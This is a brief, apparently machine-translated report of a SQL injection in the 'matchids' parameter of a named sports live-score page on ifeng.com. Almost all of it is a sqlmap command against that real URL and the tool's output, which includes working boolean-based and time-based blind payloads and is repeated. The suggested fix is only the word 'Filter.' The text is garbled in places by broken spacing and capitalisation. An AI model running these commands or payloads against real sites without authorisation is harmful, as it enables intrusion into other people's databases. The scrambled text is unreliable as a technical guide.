One SQL injection in the Phoenix sports live room
Sqlmap. py-u "http://live.sports.ifeng.com/sports/schedule.php? Format = js & matchids = "injection is caused by lax filtering.
G:/python/sqlmap> sqlmap. py-u "http://live.sports.ifeng.com/sports/schedule.php?
Format = js & matchids ="
Sqlmap/1.0-dev-automatic SQL injection and database takeover tool
Http://sqlmap.org
[!] Legal disclaal: Usage of sqlmap for attacking targets without prior mutual
Consent is illegal. It is the end user's responsibility to obey all applicable
Local, state and federal laws. Developers assume no liability and are not respon
Sible for any misuse or damage caused by this program
[*] Starting at 00:48:09
[00:48:09] [WARNING] using 'C:/statements and Settings/mm/. sqlmap/output' as
Output directory
[00:48:09] [INFO] resuming back-end DBMS 'mysql'
[00:48:09] [INFO] testing connection to the target URL
Sqlmap got a 302 redirect to 'http: // www.ifeng.com '. Do you want to follow? [Y/n
] Y
[00:48:14] [INFO] heuristics detected web page charset 'ISO-8859-2'
Sqlmap identified the following injection points with a total of 0 HTTP (s) reque
Sts:
---
Place: GET
Parameter: matchids
Type: boolean-based blind
Title: OR boolean-based blind-WHERE or HAVING clause (MySQL comment)
Payload: format = js & matchids =-5547 OR (5410 = 5410 )#
Type: AND/OR time-based blind
Title: MySQL> 5.0.11 OR time-based blind
Payload: format = js & matchids =-5830 OR 5843 = SLEEP (5)
---
[00:48:20] [INFO] the back-end DBMS is MySQL
Web application technology: Nginx
Back-end DBMS: MySQL 5.0.11
Sqlmap. py-u "http://live.sports.ifeng.com/sports/schedule.php? Format = js & matchids ="
Place: GET
Parameter: matchids
Type: boolean-based blind
Title: OR boolean-based blind-WHERE or HAVING clause (MySQL comment)
Payload: format = js & matchids =-5547 OR (5410 = 5410 )#
Type: AND/OR time-based blind
Title: MySQL> 5.0.11 OR time-based blind
Payload: format = js & matchids =-5830 OR 5843 = SLEEP (5)
---
Solution:
Filter.